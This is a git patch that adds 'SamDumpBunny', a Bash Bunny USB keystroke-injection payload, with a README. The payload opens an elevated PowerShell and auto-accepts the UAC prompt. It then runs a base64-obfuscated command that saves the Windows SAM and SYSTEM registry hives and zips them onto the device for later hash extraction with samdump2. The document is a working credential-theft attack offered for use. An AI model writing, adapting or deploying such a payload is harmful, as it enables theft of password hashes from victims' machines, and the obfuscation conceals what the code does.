From 614d313690580aba87bb1facb4fbc29e4e2e1a40 Mon Sep 17 00:00:00 2001
From: 0iphor13 <79219148+0iphor13@users.noreply.github.com>
Date: Wed, 8 Jun 2022 11:13:14 +0200
Subject: [PATCH] Uploaded SamDumpBunny
Dumps users sam & system hive, which can be used later to extract the users hashes
---
.../credentials/SamDumpBunny/README.md | 21 ++++++++
.../credentials/SamDumpBunny/payload.txt | 53 +++++++++++++++++++
2 files changed, 74 insertions(+)
create mode 100644 payloads/library/credentials/SamDumpBunny/README.md
create mode 100644 payloads/library/credentials/SamDumpBunny/payload.txt
diff --git a/payloads/library/credentials/SamDumpBunny/README.md b/payloads/library/credentials/SamDumpBunny/README.md
new file mode 100644
index 00000000..7d023d7e
--- /dev/null
+++ b/payloads/library/credentials/SamDumpBunny/README.md
@@ -0,0 +1,21 @@
+**Title: SamDumpBunny**
+
+Author: 0iphor13
+OS: Windows
+Version: 1.0
+
+**What is SamDumpBunny?**
+#
+
SamDumpBunny dumps the users sam and system hive and compresses them into a zip file.
+Afterwards you can use a tool like samdump2 to extract the users hashes.
+
+
+**Instruction:**
+1. Plug in your Bashbunny and wait a few seconds
+
+2. Unzip the exfiltrated zip file onto your machine.
+
+3. Use a tool like samdump2 on your machine to extract the users hashes.
+ > `samdump2 BunnySys BunnySam`
+
+
\ No newline at end of file
diff --git a/payloads/library/credentials/SamDumpBunny/payload.txt b/payloads/library/credentials/SamDumpBunny/payload.txt
new file mode 100644
index 00000000..cc3120e3
--- /dev/null
+++ b/payloads/library/credentials/SamDumpBunny/payload.txt
@@ -0,0 +1,53 @@
+#!/bin/bash
+#
+# Title: SamDumpBunny
+# Description: Dump users sam and system hive and exfiltrate them. Afterwards you can use a tool like samdump2, to get the users hashes.
+# Author: 0iphor13
+# Version: 1.0
+# Category: Credentials
+# Attackmodes: HID, Storage
+
+LED SETUP
+
+Q DELAY 500
+
+GET SWITCH_POSITION
+DUCKY_LANG de
+
+Q DELAY 500
+
+ATTACKMODE HID STORAGE
+
+#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING
+
+LED STAGE1
+
+Q DELAY 1000
+RUN WIN "powershell Start-Process powershell -Verb runAs"
+Q ENTER
+Q DELAY 1000
+
+#Shortcut for pressing yes - Needs to be adapted for your language (ger=ALT j;engl=ALT y; etc...)
+Q ALT j
+Q DELAY 250
+
+Q DELAY 250
+Q STRING "powershell.exe -NoP -enc cgBlAGcAIABzAGEAdgBlACAAaABrAGwAbQBcAHMAYQBtACAAQgB1AG4AbgB5AFMAYQBtADsAcgBlAGcAIABzAGEAdgBlAC"
+Q DELAY 250
+Q STRING "AAaABrAGwAbQBcAHMAeQBzAHQAZQBtACAAQgB1AG4AbgB5AFMAeQBzADsAQwBvAG0AcAByAGUAcwBzAC0AQQByAGMAaABpAHYAZQAgAC0AUABhAHQAaAAgA"
+Q DELAY 250
+Q STRING "CIAJABQAFcARABcAEIAdQBuAG4AeQBTAHkAcwAiACwAIAAiACQAUABXAEQAXABCAHUAbgBuAHkAUwBhAG0AIgAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBu"
+Q DELAY 250
+Q STRING "AFAAYQB0AGgAIABTAGEAbQBEAHUAbQBwAEIAdQBuAG4AeQAuAHoAaQBwADsAcgBlAG0AbwB2AGUALQBpAHQAZQBtACAAQgB1AG4AbgB5AFMAeQBzADsAcgBl"
+Q DELAY 250
+Q STRING "AG0AbwB2AGUALQBpAHQAZQBtACAAQgB1AG4AbgB5AFMAYQBtADsAZQB4AGkAdAA="
+Q DELAY 250
+Q STRING ";mv SamDumpBunny.zip ((gwmi win32_volume -f 'label=''BashBunny''').Name+'\loot');\$bb = (gwmi win32_volume -f 'l"
+Q DELAY 250
+Q STRING "abel=''BashBunny''').Name;Start-Sleep 1;New-Item -ItemType file \$bb'DONE';Start-Sleep 3;(New-Object -comObject Shel"
+Q DELAY 250
+Q STRING "l.Application).Namespace(17).ParseName(\$bb).InvokeVerb('Eject');Start-Sleep -s 5;Exit"
+Q DELAY 300
+Q ENTER
+
+LED FINISH
\ No newline at end of file